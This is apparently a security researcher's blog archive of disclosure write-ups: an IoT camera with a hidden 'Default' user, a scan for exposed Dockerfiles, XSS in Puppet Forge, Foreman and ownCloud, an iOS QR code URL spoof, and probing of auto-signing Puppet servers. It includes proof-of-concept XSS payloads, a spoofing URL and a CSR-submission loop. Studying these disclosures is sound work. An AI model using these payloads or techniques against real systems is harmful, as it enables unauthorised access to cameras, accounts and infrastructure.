When accessing the filesystem for the first time, the “/etc/user.db” SQLite database was discovered, which contains two users: “admin” and “Default”. The mobile application never allows specifying a username, and changing the password through the application only changes the password of the “admin” user. But as observed in the network traffic investigation, the application does send the username “admin” in the authentication request.

Looking further into the SQLite database we can get the schema of the “USER” table:

The “Default” account has different permission flags, but the “ENABLE” flag is set on it as well. The “REMOTE” flag differs between the accounts. To check whether these flags have any meaning, the flags of the “admin” user were changed to match those of the “Default” user:

After that, connecting as the “admin” user still worked. The next logical step was to authenticate to the camera as the “Default” user, but again, it’s not possible to specify the username in the application. Reverse engineering the mobile application was briefly considered and then discarded. Instead, an interception proxy was created that simply replaces the username on the network layer; since the application doesn’t use any form of encryption, this should be possible. Sending different authentication attempts to the camera with short and long passwords showed that the length of the packet always remains the same and that the data directly after the password is padded with null bytes:

Another attempt with a longer password showed up like this on the wire:

To authenticate as the “Default” user, a Scapy script was implemented which matches “admin\x00\x00” and replaces it with “Default”, as shown here (relevant part only, full script on GitHub):

Running this script on a Linux VM and configuring that VM as the gateway for the mobile phone routes the traffic through it. When the authentication packet is sent, it gets matched and the username is replaced:

And it worked, the mobile application displayed the video stream of the camera.

As can be seen in this video, the first connection attempt does not work; the application sends “admin” and “123456”. After that, the intercept script on the gateway is started, and the username “admin” is replaced with “Default” on the next attempt. The login then works and the stream is displayed:

For creating that video, the “admin” user password was changed beforehand, so that any login with that account would fail. Capturing the traffic arriving at the camera also shows that the “Default” user has been sent correctly:

This is extremely critical. Even if a user changed the password of the camera, an attacker can still access the video stream. This again works even if the camera is behind a firewall or NAT device, as long as it has outbound internet connectivity. The “Default” user is not documented, and its password cannot be changed through the application.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance.

Telnet service running by default, allowing remote root access through hardcoded password (CVE-2020-27555)

On the camera, the telnet service is running by default on port 23/tcp. Since the password of the root user is the same across all devices, this allows an attacker with direct network access to simply log in as root.

Video-stream user credentials stored in plain-text (CVE-2020-27557)

The password used to access the stream is stored in plain-text in a SQLite database (“/etc/user.db“).

An attacker with access to the system can extract the plain-text password. If the user has changed the password, an attacker can gain access to the video stream again through this.

Web-server is serving /etc folder allowing download of sensitive files (CVE-2020-27553)

The web server on the system is configured with the option “DocumentRoot /etc“. This allows an attacker with network access to the web server to download any files from the “/etc” folder without authentication.

As an example, the root password hash, the device ID, the configured usernames and passwords in plain text as well as the wireless configuration in plain text were accessed.

With this an attacker has all the information to access the video stream or further compromise the network through the Wireless network credentials.

Predictable device ID used as identifier to connect to the video stream (CVE-2020-27556)

When accessing a video stream, only the device ID and the password of the system are required. The device ID is the serial number of the board; it is only 8 hex characters long and not randomized. Devices get this ID assigned sequentially during manufacturing.

If the user did not change the password, the device ID is enough to access the video stream, even if the device is not publicly reachable (e.g. behind a firewall or NAT device) as the camera is connecting to a central server which allows connecting back to it.

Credentials are sent in plain-text over the network (CVE-2020-27554)

When the mobile application connects to the camera to view a video stream, the username and password are sent in plain text over the network to authenticate.

Undocumented user can remotely access video stream (CVE-2020-27558)

The camera application has two users configured, “admin” and “Default”. The “admin” user is used by the mobile application automatically; specifying a username is not possible, and only the password of the “admin” user can be changed. The “Default” user is not documented or visible, its password cannot be changed through the mobile application, and that password is “123456”.

By modifying the authentication packet which the mobile application sends to the camera and simply replacing the string “admin” with “Default” (as well as supplying the password “123456”), this user can be used to log in to the camera. That user has permission to view the video stream. A PoC has been published on GitHub.

Even if the user did change the password an attacker can now view the video stream using the “Default” user. This is again possible even if the camera is behind a firewall or NAT device as long as outbound internet connectivity is available to it.

Conclusion

The vulnerabilities found in the analysis were far more critical than what I had expected.

The fact that this camera does not clearly communicate that it is publicly reachable even when deployed in an internal network is very dangerous. I suspect many users don’t change the default password because they believe that the device is not accessible anyway.

However, due to the hidden “Default” user, which cannot be disabled, this doesn’t matter much at all: changing the password is almost pointless. Every stream can be viewed by unauthorized attackers, and the device IDs are not nearly random enough to protect the cameras from being found. Chaining these vulnerabilities together, an attacker can simply iterate over all online cameras and view their video streams.

If you own such a camera, I recommend disconnecting it immediately. A patch for these flaws is currently not available.

Disclosure timeline

2020-07-23: Attempted to contact Conrad through Twitter since no other direct contact information could be found, BASETech doesn’t even operate a website.
2020-07-29: Attempted to contact Conrad through the email address displayed on their imprint page
2020-08-06: Conrad confirms that this is the correct channel, requests details
2020-08-06: Sent details of vulnerabilities
2020-09-08: Conrad states that the vulnerabilities have been forwarded to their supplier, and that this camera will temporarily not be sold by them anymore until an update is published
2020-09-18: Requesting an update, camera is still being sold in the online shop
2020-09-18: Conrad states that they will internally investigate
2020-10-22: Requesting an update, camera is still being sold in the online shop
2020-10-26: Conrad states that they will again internally investigate
2020-11-02: CVE-2020-27553, CVE-2020-27554, CVE-2020-27555, CVE-2020-27556, CVE-2020-27557 and CVE-2020-27558 have been assigned to these vulnerabilities
2020-11-04: Publication of this blog post, camera is still being sold in the online shop

Scanning the Alexa top 1M sites for Dockerfiles

Intro

Recently I stumbled over a site which publicly served its Dockerfile. That particular instance wasn’t very interesting. But I started to wonder how widespread this is and what sites are exposing because of it.

By all means, this isn’t exactly new; /Dockerfile has been in the SecLists repository for a while.
However, it seems that so far nobody has (publicly) investigated this. I’m also still operating a bunch of sites that are in the top 1 million list, and I couldn’t find a single request for this file in my (limited) log files.

So I started my own scan of the Alexa top 1 million sites list.
This work was heavily inspired by past research of Hanno Böck, and in particular I used his wonderful tool snallygaster to conduct most of the scans. Thanks Hanno!

What is a Dockerfile?

A Dockerfile is the blueprint of a container: a simple plain-text file containing all commands needed to build it. You can tell Docker to copy files into the container, expose network ports and of course run any command during the build, for example:


FROM nginx

COPY default.conf /etc/nginx/conf.d/default.conf

COPY html/ /usr/share/nginx/html

RUN echo "192.168.1.14 mysql" >> /etc/hosts

EXPOSE 80

Basically, you describe exactly how the container is configured, which packages are installed and which commands are run in the process of building it.

As you can see it doesn’t necessarily contain sensitive information. In the above example we don’t even see which files are copied to the NGINX document root.

Results

Out of the 1’000’000 sites 659 served a Dockerfile.
There is large reuse of existing Dockerfiles; one in particular was used 105 times.
Overall this boils down to 338 unique Dockerfiles being served.

41 were used two times or more, in detail:

The remaining 298 were uniquely used by only one site.

Most of them performed fairly innocent operations that didn’t tell us much, such as:

Not much there that we couldn’t also figure out by looking at the site directly.

A lot of them gave us a very detailed view of what is probably running on the server, e.g.:

It’s nice to know exactly which PHP modules are used on the server, this might be useful in some cases.

But as I dug deeper, I found that sometimes not only the Dockerfile was exposed but also many of the referenced configuration files. For example, in this Dockerfile “docker/nginx.conf” is copied:

Which we then can simply try to access like this:

Somewhat common in that scenario are TLS certificates and, well, keys. I’ve found around 10 of those, for example:

And some people simply do insane things in their Dockerfile, like exposing their AWS secret key:

Or using a tool called “sshpass” to pipe a password into ssh to automate an rsync:

And at least one SSH root key is being served:

Overall I found SSH keys, npm tokens, TLS keys, passwords, AWS secrets, Amazon SES credentials, countless configuration files and source code of some of the applications.

These are of course the extreme examples which are to be expected on such a wide range scan.

How does this happen?

By default the Dockerfile is not copied into the container and certainly not to a publicly served folder.

From what I can tell the mistake that most of these sites make is practically this (real example from the scan):

With the first COPY line they copy everything in the current folder to a publicly served folder.
Afterwards, configuration files are copied.
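Reconstructed with illustrative paths, the pattern looks like this:

FROM nginx
# copies the entire build context - Dockerfile, configs, keys - into the webroot
COPY . /usr/share/nginx/html
COPY docker/nginx.conf /etc/nginx/nginx.conf
COPY docker/ssl/ /etc/nginx/ssl/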

With this, both the nginx.conf and the complete ssl directory are public. We can now simply fetch the nginx.conf, look up the names of the certificate and key files, and then fetch those as well.

In some cases there was no such COPY command. I can only guess that the files ended up in the document root due to another mistake, possibly unrelated to Docker.

Conclusion

With only 0.066 % of sites exposing a Dockerfile, this doesn’t look like a very widespread problem. And on top of that, only a subset of those – fewer than 100 – expose really critical information that can lead to a compromise.

But in any case, it rarely makes sense to publicly serve a Dockerfile.
Even if you don’t include any keys, passwords or other secrets: it still doesn’t make sense to give everyone a blueprint of your system.
The sites that don’t expose anything critical right now might start doing so in the future when changes are made to this seemingly private file.

It’s generally good advice – even if you don’t use Docker – to simply check your public webroot folder for any files that shouldn’t be there and remove them.


XSS on forge.puppet.com

I found a vulnerability on forge.puppet.com which allowed me to store XSS on the module page of a module I own.
User interaction was still required to execute the JavaScript payload (hovering over a link on the page), so the risk was rather limited.

The issue was that not all values in metadata.json of uploaded modules were correctly sanitized. You could upload a module with the following metadata.json payload (abbreviated):

  "operatingsystem_support": [
    {
      "operatingsystem":"CentOS",
      "operatingsystemrelease":[ "5", "6", "7<script>alert('xss')</script>" ]
    }
  ],

When a user then visited the module page and hovered over the “CentOS” link to figure out which versions are supported, the JavaScript payload would be executed:

This issue has been fixed by the Puppet team.

Timeline:
2018-03-24 – Issue was reported to the Puppet security team.
2018-04-01 – Asking for feedback if the report has been received.
2018-04-01 – Puppet security team confirms and says it’s added to their backlog.
2018-06-13 – Asking for feedback if the issue is resolved.
2018-06-13 – Puppet security team confirms it’s fixed, possibly already since March.


iOS camera QR code URL parser bug

I’ve learned recently that the iOS 11 camera app now automatically scans QR codes and interprets them.
This is pretty cool; until now you needed special apps to do that on iOS.
When scanning a QR code which contains a URL – in this case https://infosec.rm-it.de/ – iOS will show a notification like this:

Naturally the first thing I want to try is to construct a QR code which will show an unsuspicious hostname in the notification but then open another URL in Safari.

And this is exactly what I found after a few minutes. Here it is in action:

There is no redirect misuse being done on facebook.com; Safari will only access infosec.rm-it.de.

Details:

If you scan this QR code with the iOS (11.2.1) camera app:

The URL embedded in the QR code is:
https://xxx\@facebook.com:443@infosec.rm-it.de/
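Such a code can be generated with e.g. the qrencode tool:

# the backslash is part of the URL and stays literal inside single quotes
qrencode -o qr.png 'https://xxx\@facebook.com:443@infosec.rm-it.de/'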

It will show this notification:

But if you tap it to open the site, it will instead open https://infosec.rm-it.de/:

The URL parser of the camera app has a problem detecting the hostname in this URL the same way Safari does.
It probably detects “xxx\” as the username to be sent to “facebook.com:443”.
Safari, on the other hand, might take the complete string “xxx\@facebook.com” as a username and “443” as the password to be sent to infosec.rm-it.de.
This leads to a different hostname being displayed in the notification compared to what is actually opened in Safari.

This issue has been reported to the Apple security team on 2017-12-23.
As of today (2018-03-24) this is still not fixed.

Update:
On 2018-04-24 this has been fixed with iOS 11.3.1 and macOS 10.13.4.
CVE-2018-4187 has been assigned to both issues.


Stored XSS in Foreman

Following up a bit on my recent post “Looking at public Puppet servers”, I was wondering how an attacker could extend their rights within the Puppet ecosystem, especially when a system like Foreman is used. Cross-site scripting could be useful for this: gaining access to Foreman would basically allow an attacker to compromise everything.

I focused on facts first. Facts are generated by the local system and can be overwritten given enough permissions. Displaying facts in the table seemed to be secured sufficiently; however, there is another function on the /fact_values page: showing a distribution graph of a specific fact.

When the graph is displayed, HTML tags are not removed from facts and XSS is possible, both in the fact name (as a header in the chart) and in the fact value (in the legend of the chart).

For example, add two new facts by running:


mkdir -p /etc/facter/facts.d/
cat << EOF >> /etc/facter/facts.d/xss.yaml
---
aaa_test_fact<script>alert(1)</script>: xxx
aab_test_fact: x<script>alert(1)</script>xx
EOF

It will show up like this on the global /fact_values page:

Clicking on the “Show distribution chart” action on either of those facts will execute the provided alert(1) JavaScript:

That’s fun but not really useful; tricking someone into clicking on the distribution chart of such a weird fact seems impractical.

But since the XSS is in the value of the fact, we can just overwrite more interesting facts on that node and hope that an administrator wants to see the distribution of one of them. For example, let’s add this to xss.yaml:

kernelversion: x><script>alert(1)</script>xx

Now, if an administrator wants to know the distribution of kernel versions in their environment and uses the chart feature on any host, the alert(1) JavaScript will get executed. This is what any other node will look like:

And after navigating to the kernelversion distribution chart on that page:

Still, some interaction is needed. I’ve noticed that on the general /statistics page the same graphs are used, and facts like “manufacturer” are shown in them. Unlike the other graphs, these do not have a legend. But when you hover over a portion of the graph, you get a tooltip with the fact value. This is again vulnerable to XSS. For example, add to xss.yaml:

manufacturer: x<img src='/' onerror='alert(1)'>x

Now when you visit the /statistics page and move the mouse over the hardware graph, the alert(1) will execute:

Still needs interaction. But if you inject a value into all the graphs, it may not take long for an administrator to hover over one of them.

However: by default Foreman uses CSP, so stealing someone’s session with this setup is not easily possible. My initial plan to steal an administrator’s Foreman session therefore failed in the end.

This was tested on Foreman 1.15.6 and reported to the Foreman security team on 2017-10-31.
CVE-2017-15100 has been assigned to this issue.
A fix is already implemented and will be released with version 1.16.0.


Looking at public Puppet servers

This is about research I did a while ago but only now found the time to write about.

At the beginning of this year I was curious to see how many Puppet 3 servers – freshly end-of-life back then – were connected directly to the internet:

If you don’t know Puppet: it’s a configuration management system that contains the information needed to deploy systems and services in your infrastructure. You write code which defines how a system should be configured, e.g. which software to install, which users to deploy, how a service is configured, and so on.
It typically uses a client-server model: the clients periodically pull their configuration (the “catalog”) from their configured server and apply it locally. Everything is transferred over TLS encrypted connections.

Puppet uses TLS client certificates to authenticate nodes. When a client (the “puppet agent”) connects to a server for the first time, it generates a key locally and submits a certificate signing request to the server.
An operator then needs to sign the certificate, and from that point on the agent can pull its configuration from the server.
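
In commands, the normal flow looks roughly like this (Puppet 3 syntax; the node name is a made-up example):

# On the new agent: generate a key, submit a CSR and poll for the
# signed certificate every 60 seconds:
puppet agent --test --waitforcert 60

# On the server: review pending requests and sign the node:
puppet cert list
puppet cert sign agent01.example.com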

However, it is possible to configure the Puppet server to simply sign all incoming CSRs automatically.
This is obviously not recommended unless you want to hand possibly sensitive information about your infrastructure to anyone who asks. The Puppet documentation mentions several times that this is insecure: https://docs.puppet.com/puppet/3.8/ssl_autosign.html#nave-autosigning
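
For reference, naive auto-signing is a single setting on the server – a sketch of the relevant puppet.conf section, not a recommendation:

# puppet.conf – signs every incoming CSR without any checks, do not use this:
[master]
  autosign = true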

First I was interested whether anyone is already looking for servers configured like this.
I set up a honeypot Puppet server with auto-signing enabled and waited.
But after months there still was not a single CSR submitted; only port scanners tried to connect to it.

I decided to look for those servers myself.
With a small script I looped over around 2500 servers that were still online – there were more, but due to time constraints I only checked 2500. I built a system which connects to each of those servers and submits a CSR. The “certname” – this is what operators see when reviewing CSRs – was always the same, and it was pretty obvious that it was not a legitimate request.
An actual attacker would do more recon, get the FQDNs of the Puppet server from its certificate and try to guess a more likely name.
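
A minimal sketch of such a probe – everything here (certname, file names, ssldir layout) is illustrative, not my actual script:

# Loop over candidate servers, submit a CSR to each and check whether we
# get a catalog back; --noop makes sure nothing is ever applied locally:
while read -r server; do
  puppet agent --test --noop \
    --server "$server" \
    --ssldir "/tmp/scan-ssl/$server" \
    --certname not-a-real-node \
    --waitforcert 0
  rc=$?
  # with --test, exit codes 0 and 2 both mean a catalog was compiled for us
  [ "$rc" -eq 0 ] || [ "$rc" -eq 2 ] && echo "$server: catalog received"
done < servers.txt

A separate ssldir per server keeps the generated keys apart, which also makes it easy to reconnect later with exactly the same key.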

Out of those 2500 servers:
89 immediately signed our certificate.

Out of those 89:
50 compiled a valid catalog that could have been applied directly.
39 tried to compile a catalog and failed with issues that could potentially be worked around on the client but no time was spent on that.

It is a normal setup to have a default role: if an unknown node connects, it may get only this default configuration applied. Usually this deploys the administrative user accounts and sets generic settings. This happened a lot, and it is already problematic: the system accounts also get their password hash configured, which can now be brute-forced offline. A lot of servers also conveniently sent along their sudoers configuration, allowing an attacker to target higher privileged accounts directly.
But some of those servers automatically assigned more generic roles, exposing root SSH keys, AWS credentials, configuration files of their services (Nginx, PostgreSQL, MySQL, …) and passwords / password hashes of database and other service users – some even tried to copy source code onto my node:

And more. Some systems could be immediately compromised with the information they leak; the others at least tell an attacker a lot about the system, which makes further attacks much easier.

Here is where it gets interesting: one day later I connected to the same 2500 servers again, using the same keys from the day before, and tried to retrieve a catalog. Normally we would expect the numbers to stay stable or drop slightly. But in this case they did not:

145 servers allowed us to connect.
58 gave us a valid catalog that could be applied.

And one week later:
159 servers allowed us to connect.
63 gave us a valid catalog that could be applied.

Those servers were not offline during the first round either. They simply signed my CSR in the meantime without noticing that it was not one of their own requests – or, as I suspect, a combination of the following two items happened:

1) Generally when you are working with Puppet certificates you’ll be using “puppet cert $sub-command” to handle the TLS operations for you.

The problem is that there is no way to tell it to simply reject a signing request.
You can “revoke” or “clean” certificates, but they have to be signed first (see: https://tickets.puppetlabs.com/browse/PUP-1916).
There may have been an option using the “puppet ca” command, but it has been deprecated and pretty much all documentation only mentions “puppet cert” nowadays.

You are left with these options:

  • Manually figure out where the .csr file is stored on the server and remove it
  • Use the deprecated tool “puppet ca destroy $certname”
  • Run “puppet cert sign $certname && puppet cert clean $certname”
  • Run “puppet cert sign $certname && puppet cert revoke $certname”

Some are unfortunately using the last two options.

There is the possibility that on some of those systems my certificate request was signed if only for a few seconds. Which brings us to the next issue:

2) The Puppet server – or in some cases the reverse proxy in front of it – only reads the certificate revocation list at startup.
If you don’t restart these services after revoking a certificate, it will still be allowed to connect.

“puppet cert revoke $certname” basically only adds the certificate to the CRL; it does not remove the signed certificate from the server.
I suspect that some operators signed and revoked my certificate but did not restart the service afterwards.

“puppet cert clean $certname” on the other hand will additionally remove the signed certificate from the server; when my client connects later it cannot retrieve the signed certificate and is locked out.
This isn’t perfect either – if the client constantly requests the certificate it could retrieve it before the “clean” ran – but it is far better than only using “revoke”.

Depending on how you use Puppet, it may be one of your most critical systems, containing the keys to your kingdom. There are very few cases where it makes sense to expose a Puppet server directly to the internet.
Those systems should be among the best protected systems in your infrastructure: a compromised Puppet server essentially compromises all clients that connect to it.

Basic or naïve auto-signing should not be used in a production environment unless you can ensure that only trusted clients can reach the Puppet server. Otherwise, only policy-based auto-signing or manual signing is secure.
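
With policy-based auto-signing the server runs an executable for every incoming CSR and only signs the request if that executable exits with 0. A minimal sketch – the script path and the hostname pattern are made-up examples, not from an actual deployment:

# puppet.conf on the server: point autosign at an executable policy script
[master]
  autosign = /etc/puppet/check-csr.sh

And the script itself could look like this:

#!/bin/sh
# check-csr.sh – Puppet passes the certname as the first argument and the
# PEM encoded CSR on stdin; exit 0 signs the request, anything else rejects it.
csr=$(cat)   # read the CSR from stdin (unused in this simple example)
case "$1" in
  *.internal.example.com) exit 0 ;;   # only sign our own naming scheme
  *) exit 1 ;;
esac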

XSS in ownCloud 2

A few weeks ago ownCloud 4.0.0 was released, including some cool features like encryption of uploaded files. I decided to take it for a spin again.

Again I found some XSS vulnerabilities. As last time, I reported these issues to the ownCloud team, which responded quickly and already fixed them (with version 4.0.2). As far as I can tell, CVE-2012-4396 was assigned to these issues (and others were merged into it as well).

/?app=media
1) change the ID3 title tag of an MP3 file to: “Kalimba<script>alert(1)</script>”
2) upload it
3) play it in the integrated player – the JavaScript gets executed
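
Setting the tag itself is trivial, for example with the id3v2 command line tool (an assumption on my side – any ID3 tag editor works; the file name is made up):

# Write the payload into the ID3 title (TIT2) frame:
id3v2 --song 'Kalimba<script>alert(1)</script>' kalimba.mp3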

Now this is fun! Imagine someone sending you an MP3 which you listen to with ownCloud while in the background your cookies are sent to a remote system. If you run an ownCloud instance with multiple users, you can also share those files. It might be enough to listen to a shared MP3 to get your account compromised – I didn’t verify this though.

/?app=files&getfile=download.php
1) upload a picture, e.g. trollface.jpg
2) rename the picture to “trollf<style onload=alert(1)>ace.jpg”
3) view the picture – the JavaScript gets executed

I can’t think of a good scenario where this would be useful. Maybe sharing the file.

/?app=calendar
1) add a new appointment with the title: “XSS <script>alert(1);</script>”
2) switch the calendar view to “list” – the JavaScript gets executed

This was a bit surprising, as the normal calendar view was not affected – only the list view.

XSS in ownCloud

A few weeks ago there was a bit of hype around ownCloud when they released version 3.0.1. I decided to give it a spin; here is what I found.

Note: I contacted the development team earlier and these vulnerabilities have been fixed in the meantime with version 3.0.2, although I have not confirmed this myself due to lack of time.

XSS in files/download.php

An attacker can send a URL to the victim and JavaScript will be executed in the victim’s session. The attacker does not need an account on the ownCloud instance, only knowledge of the URL path:


http://localhost/owncloud/files/download.php?file=/xss.png%3Cscript%3Ealert(1)%3C/script%3E

XSS in files/index.php

If you share your ownCloud instance with multiple users, an attacker can send a URL to the victim and JavaScript will be executed in the victim’s session. Both the attacker and the victim need accounts on the same instance.

Here is how:

1) Create a new folder on http://localhost/owncloud/files/index.php – any name will do, I used “PoC”

2) Share this folder with your victim or the victim’s group

3) Switch to http://localhost/owncloud/files/index.php?dir=/PoC

4) Create a folder, called:

x"> <body onload=alert(1)><x="

5) Send that link to your victim:


http://localhost/owncloud/files/index.php?dir=/Shared/PoC/x%22%3E%20%3Cbody%20onload%3Dalert%281%29%3E%3Cx%3D%22

6) ???

7) Profit!

It may be possible to create the folder directly in /, however I couldn’t get that folder shared with other users. But since a folder is automatically shared when its parent folder is shared, I didn’t invest much time into that.

XSS in apps/contacts/index.php

I found another XSS flaw in the Contacts function: create a contact and add this to any field:

foo"><script>alert(1)</script>

and the JavaScript will also execute. However, since you cannot share contacts between users (or can you?), I believe this is a minor problem.